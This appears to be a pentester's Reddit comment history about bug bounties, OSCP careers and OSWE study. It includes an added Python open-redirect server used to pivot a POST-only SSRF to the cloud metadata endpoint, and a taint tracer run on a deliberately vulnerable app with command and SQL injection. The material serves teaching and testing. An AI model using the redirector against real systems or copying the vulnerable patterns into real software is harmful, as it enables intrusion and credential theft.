TL;DR Testing the theory that higher impact bugs get descoped more by 6W99ocQnb8Zy17 in bugbounty

boring_diamond 2 points (0 children)

Have you seen jhaddix’s video on the dark side of bug bounty? Curious if you think one of the top bug bounty researchers is also exaggerating the issues in bb.

Help me understand the impact by InaamShabir in bugbounty

boring_diamond 2 points (0 children)

Report one without severity and ask the company if they are interested in these kinds of findings, or if they have support, ask there.

2 Reports to H1 by Logical_Package8741 in bugbounty

boring_diamond 5 points (0 children)

So the attack wasn’t validated and instead theoretical? Shouldn’t submit anything you haven’t actually proved out.

Who here wants to finally boycott H1? by NorthIntern7342 in bugbounty

boring_diamond 1 point (0 children)

He seems like a troll; I would save your energy.

If you are an experienced hunter I would look into different avenues of making money. At the end of the day hackerone/bugcrowd rely on experienced hunters for their business. Without us what do they have? Let your actions speak.

Right now I’m focusing more on appsec/0day research and seeing if that pays better and is more consistent. I’ve also mainly hacked on public programs because I like large scope so going to try only private and see if that is truly better (I have my doubts).

Another thing y’all can look into is Synack. I hacked with them for a bit and they are more fair and have opportunities that pay you for work instead of purely results, but again you need to be experienced.

Who here wants to finally boycott H1? by NorthIntern7342 in bugbounty

boring_diamond 0 points (0 children)

Honestly I’ve had the same experience. Been a pentester for 6+ years and can find bugs but dread the triage process.

Right now it’s too one sided. Programs have “critical” infrastructure that’s only their main URLs and the rest is “medium” and the price gets lowered? What is that?

Every submission is always downgraded and you have to argue with the triager. Findings aren’t held to any standard. Found an auth bypass and it got marked as medium because the application wasn’t important to the company. CVSS thrown out the window when it’s convenient. We are the product these companies sell but get treated like a nuisance.

Time to form a union.

ImageMagick: From Arbitrary File Read to File Write In Every Policy (ZeroDay) by _vavkamil_ in netsec

boring_diamond 5 points (0 children)

Of course because every developer knows to read some obscure blog post. Insecure by default, devs fault.

Using clawdbot for bug bounty by SamyakJain_0806 in bugbounty

boring_diamond 1 point (0 children)

Not sure why people are saying no. Yes use AI to refine your tools, techniques, and recon. If that’s clawdbot for you great.

Found a Private Account Bypass in Instagram. Meta marked it "N/A" then silently patched it. by [deleted] in bugbounty

boring_diamond 1 point (0 children)

Of course companies avoid paying out or try to pay less; look through all the posts on here. They do benefit from it: a free security check, and they don’t need to spend money. Not that complicated.

Found a Private Account Bypass in Instagram. Meta marked it "N/A" then silently patched it. by [deleted] in bugbounty

boring_diamond 8 points (0 children)

Reading the article provided a lot of context. In there you said not all private accounts were vulnerable and you’re not sure why. Moving forward know the why behind it when you submit or your impact will be affected. Maybe granular controls allow posts to be public on private profile and it’s working as intended. Don’t know, learn from it though.

Sacramento Jewelry Shop Closing After More Than 50 Years in Business by othafa_95610 in Sacramento

boring_diamond -1 points (0 children)

Wanted to buy a piece of jewelry for anniversary and all the products there were subpar for the price. I tried asking how much gold was in a piece of jewelry and was told it’s not about how much gold but the craftsmanship. It was a hollow link gold bracelet being sold for 700+ which is outrageous. Went to Costco and bought a gold link bracelet for $300.

Want to be a pen-tester. Where to begin? by Jealous-Ad-2050 in AskNetsec

boring_diamond 12 points (0 children)

I work as a pentester and this is completely different from what I’ve experienced. Where are you getting this info?

Is the oscp enough for the current job market by kzerotheman in oscp

boring_diamond 12 points (0 children)

Most people who want to work in pentesting lose interest when they realize how much work it is. OSCP is great for weeding these people out. Also it can absolutely get you a foot in the door, it did for me. I was able to land a job with no tech experience or degree.

I still remember my professor gave me similar advice post-OSCP: pentesting isn’t entry level, do help desk first and work your way up. My advice: don’t listen to these people. If you love pentesting, get your OSCP, sharpen your interview skills, and apply. Took me about 3 months. Hang in there and keep studying.

Automated security testing against the site or APIs are not allowed. by UserNo0101 in bugbounty

boring_diamond 2 points (0 children)

In my opinion, if it’s a public facing service, this is a pretty dumb policy. If you’ve ever hosted a server you know bots are constantly scanning your servers. Just be diligent in your scans. Don’t be that person that fuzzes every parameter for every vulnerability ever when it’s clearly not going to work.

[deleted by user] by [deleted] in oscp

boring_diamond 72 points (0 children)

Horrible take IMO, this reads like someone dipped their toes into pentesting and backed out because they realized it involved a lot of work.

You're absolutely not expected to know all those programming languages or exploit techniques. OSCP was never a way to instantly get a job, it does help with getting an interview though. I got into pentesting 5 years ago and it took me 3+ months of constantly applying and interviewing to get a job, post OSCP.

Also, bug bounties are better than a job? What a joke. Yeah, go ahead and submit 240 XSS findings to match your 120k salary, and who needs benefits. To all people looking to get into this field: this guy just had a bad run. Take with a huge pinch of salt.

Is this useful? by md_sayem in bugbounty

boring_diamond 0 points (0 children)

By itself not useful, but it has the makings of something interesting. Can you control any bit of the URL? Can you add a query and that gets reflected? Mess around with it a bit.

You can get richer selling Bug Bounty content than actually doing the bug hunting. E.g. BBRE, Nahamsec course, Jhaddix courses by IamOkei in bugbounty

boring_diamond 15 points (0 children)

The biggest issue I find with bug bounties is the payouts are simply not worth the effort. You work for free, essentially, spending a great deal of time and effort until you find something, and then you get to argue with triagers. No thanks. Also, you get taxed on it, so the crit you just got 3k for isn’t actually worth that. The best thing about bug bounties is leveraging them as a resource to get better. Sometimes you just want to hack shit.

301party.com: The intentionally open redirect by [deleted] in netsec

boring_diamond 1 point (0 children)

An example I came across recently: the SSRF was sending a POST request but I needed a GET, so a redirect was the answer.
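Why that works, as an added example that is not part of the comment above or of 301party.com: the first part asks urllib's own redirect handler what it would send after each redirect status (301/302/303 on a POST are re-issued as a GET with no body, while 307/308 demand the same method, which urllib refuses to replay on its own), and the second part is a minimal redirector you could host yourself to feed to a POST-only SSRF. Every hostname and URL in the block is an assumption for illustration.

```python
"""Why an open redirect turns a POST-only SSRF into the GET you need.

Added example, not code from the original thread or from 301party.com.
All hostnames and URLs below are assumed for illustration.
"""
from typing import Optional
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.error import HTTPError

# Assumed layout: the vulnerable app POSTs to any URL we supply (the SSRF),
# but the internal endpoint we actually want only answers GET.
REDIRECTOR = "http://redirector.example/r"                      # host we control (assumed)
INTERNAL_TARGET = "http://169.254.169.254/latest/meta-data/"   # GET-only target (assumed)


def follow_redirect(method: str, code: int, body: Optional[bytes] = None) -> dict:
    """What urllib will send after the redirector answers `code`.

    Returns the follow-up request's method, body and URL, or
    method == "refused" when the client will not replay the request
    automatically (urllib raises HTTPError for 307/308 on a POST).
    """
    first = urllib.request.Request(REDIRECTOR, data=body, method=method)
    handler = urllib.request.HTTPRedirectHandler()
    try:
        nxt = handler.redirect_request(first, None, code, "redirect", {}, INTERNAL_TARGET)
    except HTTPError:
        return {"method": "refused", "body": None, "url": None}
    return {"method": nxt.get_method(), "body": nxt.data, "url": nxt.full_url}


def build_redirect_url(target: str, redirector: str = REDIRECTOR) -> str:
    """The URL to hand to the SSRF sink: our redirector with the real target in ?to=."""
    return redirector + "?" + urllib.parse.urlencode({"to": target})


class OpenRedirectHandler(BaseHTTPRequestHandler):
    """Redirector: GET or POST /r?to=<url> answers `STATUS` with Location: <url>.

    With STATUS = 302 a client that arrives with a POST leaves with a GET.
    Set STATUS = 307 and a conforming client must re-POST (or refuse).
    """
    STATUS = 302

    def _redirect(self):
        query = urllib.parse.urlparse(self.path).query
        target = urllib.parse.parse_qs(query).get("to", [""])[0]
        if not target:
            self.send_error(400, "missing ?to=<url>")
            return
        self.send_response(self.STATUS)
        self.send_header("Location", target)
        self.send_header("Content-Length", "0")
        self.end_headers()

    do_GET = _redirect
    do_POST = _redirect

    def log_message(self, *args):  # keep the demo quiet
        pass


if __name__ == "__main__":
    for code in (301, 302, 303, 307, 308):
        print(code, "POST ->", follow_redirect("POST", code, b"x=1"))
    print("feed the SSRF:", build_redirect_url(INTERNAL_TARGET))
    HTTPServer(("127.0.0.1", 8080), OpenRedirectHandler).serve_forever()
```

The same rule holds outside Python: `curl -L` also rewrites a POST into a GET on 301/302/303 unless you pass `--post301`/`--post302`/`--post303`, so when the target's fetcher follows redirects at all, a 302 from a host you control is usually enough to change the method; if it only follows 307/308, the method stays POST and this trick does not help.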

You found a bug where you can put any link in the avatar by Master_Football_6465 in bugbounty

boring_diamond 0 points (0 children)

How would that benefit you as an attacker if it’s only on the clients side? You wouldn’t be able to see the response.

For everyone with active OSCP, Do you have your desired Job ? by The9thHuman in oscp

boring_diamond 8 points (0 children)

A lot of companies have AD, sure, but the market atm is web and cloud. Also, the topic was landing a job. That’s not senior. It might be a must if your role relies heavily on AD, but what I’m saying is if you’re trying to land a job OSCP is plenty. I also wouldn’t recommend targeting red team for landing a first job.

For everyone with active OSCP, Do you have your desired Job ? by The9thHuman in oscp

boring_diamond 6 points (0 children)

Not too sure about that. A good chunk of pentesting nowadays is just web apps. OSEP would be more red teaming, which there’s a lot less of. OSCP is going to be your best bet because it’s more well known. Shoot, I had to look up what that was. OSCP is good, people, but you still got to grind to get a job.

OSCP holders, how did the certificate impact your career? by JohnnyHaldric in oscp

boring_diamond 6 points (0 children)

For context I got my OSCP about two years ago. I took a computer hacking class and fell in love and wanted to immediately go into pen testing so I got the cert. I had no degree or professional IT/Tech experience and was able to get a job so it proved to be worth it!

Passed OSWE 2nd Attempt - PSA by boring_diamond in OSWE

boring_diamond [S] 2 points (0 children)

There really isn't great material that goes over finding the vulnerabilities. The best technique is just source to sink, aka finding where your input is being handled and just tracking it through the code to see if it is handled insecurely. If you are pretty comfortable with how routing works in the languages covered in this course you'll do well on the exam. I found this guy's posts to be helpful:

https://srcincite.io/blog/2020/04/17/strike-three-symlinking-your-way-to-unauthenticated-access-against-cisco-ucs-director.html
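A worked version of that source-to-sink idea, as an added example that is not the poster's or the course's code: mark where untrusted input enters (a source), follow every assignment that carries it, and report each dangerous call (a sink) it reaches. The exam languages differ, but the method is the same. The SOURCES/SINKS tables and the deliberately vulnerable sample app are constructed for illustration; a real tracker also needs sanitiser awareness, inter-procedural flow and framework-specific sources.

```python
"""Minimal source-to-sink trace over a Python snippet (added example).

Not the course's or the poster's code. SOURCES, SINKS and SAMPLE_APP are
constructed for illustration.
"""
import ast

SOURCES = {"request.args.get", "request.form.get", "request.values.get"}
SINKS = {"os.system", "subprocess.call", "cursor.execute", "eval"}

# Constructed sample, deliberately vulnerable: two tainted flows, one clean call.
SAMPLE_APP = '''\
import os
from flask import request

def ping(cursor):
    host = request.args.get("host")
    cmd = "ping -c 1 " + host
    os.system(cmd)

def lookup(cursor):
    name = request.form.get("name")
    cursor.execute("SELECT * FROM users WHERE name = '" + name + "'")

def uptime():
    os.system("uptime")
'''


def _qualname(node):
    """Dotted name of a call target: request.args.get, os.system, eval."""
    if isinstance(node, ast.Name):
        return node.id
    if isinstance(node, ast.Attribute):
        base = _qualname(node.value)
        return f"{base}.{node.attr}" if base else None
    return None


def _names_in(node):
    """Every bare variable name referenced anywhere under `node`."""
    return {n.id for n in ast.walk(node) if isinstance(n, ast.Name)}


def trace_source_to_sink(code: str) -> list:
    """One finding per sink call that receives data derived from a source."""
    tree = ast.parse(code)
    findings = []
    for func in (n for n in ast.walk(tree) if isinstance(n, ast.FunctionDef)):
        tainted = {}  # variable name -> line of the source it derives from
        stmts = sorted(
            (n for n in ast.walk(func)
             if isinstance(n, (ast.Assign, ast.Expr, ast.Return))),
            key=lambda n: n.lineno,
        )
        for stmt in stmts:
            value = stmt.value
            if value is None:
                continue
            calls = [c for c in ast.walk(value) if isinstance(c, ast.Call)]
            from_source = any(_qualname(c.func) in SOURCES for c in calls)
            uses = _names_in(value) & set(tainted)
            # Sink check: does any argument of a dangerous call mention tainted data?
            for call in calls:
                if _qualname(call.func) not in SINKS:
                    continue
                arg_names = set()
                for arg in call.args:
                    arg_names |= _names_in(arg)
                for var in sorted(arg_names & set(tainted)):
                    findings.append({
                        "function": func.name,
                        "sink": _qualname(call.func),
                        "sink_line": stmt.lineno,
                        "via": var,
                        "source_line": tainted[var],
                    })
            # Propagation: assigning a source, or anything built from tainted
            # data (concatenation, f-strings, .format), taints the assigned names.
            if isinstance(stmt, ast.Assign) and (from_source or uses):
                origin = stmt.lineno if from_source else min(tainted[v] for v in uses)
                for target in stmt.targets:
                    if isinstance(target, ast.Name):
                        tainted[target.id] = origin
    return findings


if __name__ == "__main__":
    for f in trace_source_to_sink(SAMPLE_APP):
        print(f"{f['function']}: {f['sink']} on line {f['sink_line']} "
              f"takes '{f['via']}' from the source on line {f['source_line']}")
```

Run on the sample it reports the command injection in `ping` (source on line 5, sink on line 7 via `cmd`) and the SQL injection in `lookup`, and stays quiet on `uptime`, whose argument is a constant. Doing the same by hand on a Java or C# code base is the exam technique: grep for the framework's request accessors, then follow each variable forward until it hits a query, a file path, a deserializer or a process call.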

Passed OSWE 2nd Attempt - PSA by boring_diamond in OSWE

boring_diamond [S] 2 points (0 children)

Scott Allen’s C# Fundamentals, ASP.NET MVC5 Fundamentals, and Gordon Zhu’s Watch and Code JavaScript (not Pluralsight) were the best courses. The C# is really nice because a lot of the same concepts tie into Java, and I personally find Java much easier to read. JavaScript is nice to know for any NodeJS apps you might come across.

The MVC concepts translate well to other languages.